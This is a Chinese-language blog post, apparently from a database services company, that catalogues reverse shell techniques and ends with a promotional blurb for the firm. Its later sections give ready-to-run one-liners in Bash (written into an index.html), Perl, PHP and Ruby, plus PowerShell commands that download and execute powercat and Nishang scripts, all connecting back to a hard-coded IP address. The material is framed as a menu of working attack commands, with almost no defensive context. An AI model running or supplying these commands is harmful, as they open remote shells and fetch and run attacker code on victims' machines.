各位新朋友~记得先点蓝字关注我哦~
一、 反弹shell简介
以下介绍下几种反弹shell的方式。
二、 Bash反弹shell
Bash:Bash是一个命令处理器,通常运行于文本窗口中,并能执行用户直接输入的命令。
三、 Netcat反弹shell
Netcat:NetCat是一个非常简单的Unix工具,可以读、写TCP或UDP网络连接(network connection)。它被设计成一个可靠的后端(back-end) 工具,能被其它的程序或脚本直接地或容易地驱动。
四、 Telnet反弹shell
Telnet:Telnet协议是TCP/IP协议族中的一员,是Internet远程登录服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。
五、 Socat反弹shell
Socat:Socat 是 Linux 下的一个多功能的网络工具,名字来由是 「Socket CAT」。其功能与有瑞士军刀之称的 Netcat 类似,可以看做是 Netcat 的加强版。
Socat 并不是大多数Linux发行版本会预装的软件,需要手动进行安装
yum install -y socat 或 apt-get install socat
六、 Curl反弹shell
Curl:Curl是一个利用URL语法在命令行下工作的文件传输工具,1997年首次发行。它支持文件上传和下载,所以是综合传输工具,但按传统,习惯称Curl为下载工具。Curl还包含了用于程序开发的libcurl。
VPS创建index.html文件
cd tmp(该步骤可有可无)
echo 'bash -c "bash -i >& dev/tcp/144.34.163.241/54321 0>&1"' > index.html
七、 Perl反弹shell
Perl:Perl一种功能丰富的计算机程序语言,运行在超过100种计算机平台上,适用广泛,从最初是为文本处理而开发的,现在用于各种任务,包括系统管理,Web开发,网络编程,GUI开发等。
perl -e 'use Socket;$i="144.34.163.241";$p=9800;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
八、 PHP反弹shell
PHP:PHP(PHP: Hypertext Preprocessor)即“超文本预处理器”,是在服务器端执行的脚本语言,尤其适用于Web开发并可嵌入HTML中。
php -r '$sock=fsockopen("144.34.163.241","1100");exec("/bin/sh -i <&3 >&3 2>&3");'
九、 Ruby反弹shell
Ruby:一种简单快捷的面向对象(面向对象程序设计)脚本语言,在20世纪90年代由日本人松本行弘(Yukihiro Matsumoto)开发,遵守GPL协议和Ruby License。
ruby -rsocket -e 'c=TCPSocket.new("144.34.163.241","1127");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
十、 Powercat脚本反弹shell
Powercat:Powercat是一个powershell函数。
VPS开启端口监听:nc -lvnp 9898
靶机运行如下脚本即可看到VPS端收到反弹的会话(web服务的端口记得写)
powershell IEX (New-Object System.Net.Webclient).DownloadString(‘http://144.34.163.241:9080/powercat.ps1‘); powercat -c 144.34.163.241 -p 9898 -e cmd
十一、 Nishang脚本反弹shell
Nishang:Nishang是一个PowerShell攻击框架,它是PowerShell攻击脚本和有效载荷的一个集合。
靶机运行如下脚本即可看到VPS端收到反弹的会话(web服务的端口记得写)
powershell IEX (New-Object Net.WebClient).DownloadString('http://144.34.163.241:9933/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 144.34.163.241 -port 10010
十二、 最后
反弹shell的方式多种多样,感兴趣的可以自行探索。行文仓促,如有不足之处,欢迎指正。
美创是国内领先的数据库服务提供商。服务团队拥有PG ACED 1名、Oracle&PG ACE 3人、DSI智库专家5名、DSMM测评师7名、OCM 20余人、数十名Oracle OCP、MySQL OCP、TDSQL TCP、OceanBase OBCP、TiDB PTCP、达梦 DCP、人大金仓、红帽RHCA、中间件weblogic、tuxedo、CISP-DSG、CISSP、CDGA、CDPSE、CZTP、CDSP等认证人员,著有《DBA攻坚指南:左手Oracle,右手MySQL》,《Oracle数据库性能优化方法和最佳实践》,《Oracle内核技术揭秘》,《Oracle DBA实战攻略》等多本数据库书籍。运维各类数据库合计5000余套,精通Oracle、MySQL、SQLServer、DB2、PostgreSQL、MongoDB、Redis、TDSQL、OceanBase、达梦、人大金仓等主流商业和开源数据库。美创拥有完善的运维体系和人员培养体系,并同时提供超融合、私有云整体服务解决方案、数据安全咨询及运营服务方案等,已为金融、政府、企业、能源等多个行业的客户提供量身定制的各类服务,赢得了客户的高度赞誉和广泛认可。
